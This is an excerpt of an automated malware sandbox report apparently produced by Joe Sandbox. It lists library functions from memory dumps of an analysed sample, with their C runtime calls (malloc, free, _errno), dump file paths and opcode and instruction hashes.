                    • Opcode ID: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
                    • Instruction ID: ef13a074418b6d296590a38f5d20f9b5ca4bc9d75961e5e567413d64bbd8a4b0
                    • Opcode Fuzzy Hash: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
                    • Instruction Fuzzy Hash: 09C10C36608B859AD764CF65E88479EB7F4F789B88F10412AEB8D87B18DF38C555CB00
                    Function 0067AD44 Relevance: 5.2, APIs: 4, Instructions: 155COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • malloc.LIBCMT ref: 0067AD78
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                    • free.LIBCMT ref: 0067AEBF
                    • free.LIBCMT ref: 0067AF23
                    • free.LIBCMT ref: 0067AF2F
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$_errno$AllocHeap_callnewhmalloc
                    • String ID:
                    • API String ID: 3531731211-0
                    • Opcode ID: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                    • Instruction ID: 4dfa9effe5ef590a14f708f6425d43e3cd84eb666ee08e0ad8d86dc367fc0050
                    • Opcode Fuzzy Hash: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                    • Instruction Fuzzy Hash: D751007630064582DA98ABA2D4503AD7393FBC4B80F54893AEE0E27B56EF7DC515C706
                    Function 001BA144 Relevance: 5.2, APIs: 4, Instructions: 155COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • malloc.LIBCMT ref: 001BA178
                      • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                      • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                    • free.LIBCMT ref: 001BA2BF
                    • free.LIBCMT ref: 001BA323
                    • free.LIBCMT ref: 001BA32F
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$_errno$_callnewhmalloc
                    • String ID:
                    • API String ID: 2761444284-0
                    • Opcode ID: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
                    • Instruction ID: 186e246a70f57c853be465db647510dd0cca896556ffc241b6b8c2dc239f5aab
                    • Opcode Fuzzy Hash: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
                    • Instruction Fuzzy Hash: 5D51003130074582DE28AF22E8507ED63E2FBA5BC0F984429EE4A17B65EF79C502C701
                    Function 00664300 Relevance: 5.1, APIs: 4, Instructions: 112COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: malloc
                    • String ID:
                    • API String ID: 2803490479-0
                    • Opcode ID: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                    • Instruction ID: 530ed90c7799d936ae7596f3242aec9e382011cf7b4911ccbaf5d58aa51a8d27
                    • Opcode Fuzzy Hash: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                    • Instruction Fuzzy Hash: B541CA3230478087CB58DF66E411BAE73A2F784F88F548529EE6A87B05EF38D946C700
                    Function 001A3700 Relevance: 5.1, APIs: 4, Instructions: 112COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: malloc
                    • String ID:
                    • API String ID: 2803490479-0
                    • Opcode ID: 80bcae34b50f6f3c58066c2fc9d1801100724e039a84313f03cb0366590bdd42
                    • Instruction ID: 77d767e9024fda2d898012a813aef0076d0c7132e078364397b5c0eabe0b130c
                    • Opcode Fuzzy Hash: 80bcae34b50f6f3c58066c2fc9d1801100724e039a84313f03cb0366590bdd42
                    • Instruction Fuzzy Hash: 2C41BE7670078087CB18DF66E4107AE77A1F796B84F458625FE2A47B08EF38DA06C700
                    Function 00671038 Relevance: 5.1, APIs: 4, Instructions: 109COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$CurrentProcessfreemalloc
                    • String ID:
                    • API String ID: 1397824077-0
                    • Opcode ID: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                    • Instruction ID: e3c96e085606936993393d51645e5bd6fe23844c8dd89ffb8ca1b770db688147
                    • Opcode Fuzzy Hash: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                    • Instruction Fuzzy Hash: 52418372314A8186DB64DB26E4417AF63A3FB857D8F00942AEF8E4BB49EF3DC5418704